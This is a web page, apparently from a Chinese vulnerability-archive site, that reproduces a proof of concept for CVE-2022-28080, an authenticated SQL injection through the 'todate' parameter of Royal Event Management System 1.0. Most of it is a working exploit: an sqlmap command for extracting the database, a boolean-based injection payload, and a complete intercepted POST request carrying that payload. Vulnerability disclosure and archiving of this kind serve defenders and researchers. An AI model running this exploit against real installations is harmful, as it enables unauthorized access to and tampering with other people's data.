目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2022-28080 PoC — Royal Event Management System SQL注入漏洞

来源
关联漏洞
标题:Royal Event Management System SQL注入漏洞 (CVE-2022-28080)
Description:Event Management是一个事件管理系统。 Royal Event Management System v1.0 版本存在安全漏洞,该漏洞源于通过 todate 参数的 SQL 注入攻击。攻击者利用此漏洞可破坏应用程序、访问或修改数据,或利用基础数据库中的潜在漏洞。
Description
CVE-2022-28080
介绍
# Royal Event Management System - 'todate' SQL Injection (Authenticated)


1. Description:
----------------------

Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in
/royal_event/btndates_report.php#?=  Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.


2. Proof of Concept:
----------------------

In Burpsuite intercept the request from the affected page with
'todate' parameter and save it like poc.txt. Then run SQLmap to extract the
data from the database:

sqlmap -r poc.txt --dbms=mysql


3. Example payload:
----------------------

(boolean-based)

-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns 

4. Burpsuite request:
----------------------

POST /royal_event/btndates_report.php#?= HTTP/1.1<br>
Host: localhost<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br>
Accept-Encoding: gzip, deflate<br>
Accept-Language: en-us,en;q=0.5<br>
Cache-Control: no-cache<br>
Content-Length: 334<br>
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0<br>
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380<br>
Referer: http://localhost/royal_event/btndates_report.php#?=<br>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36<br>
<br>
--f289a6438bcc45179bcd3eb7ddc555d0<br>
Content-Disposition: form-data; name="todate"<br>
<br>
-1' OR 1=1 OR 'ns'='ns<br>
--f289a6438bcc45179bcd3eb7ddc555d0<br>
Content-Disposition: form-data; name="search"<br>
<br>
3
--f289a6438bcc45179bcd3eb7ddc555d0<br>
Content-Disposition: form-data; name="fromdate"<br>
<br>
01/01/2011<br>
--f289a6438bcc45179bcd3eb7ddc555d0--<br>
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →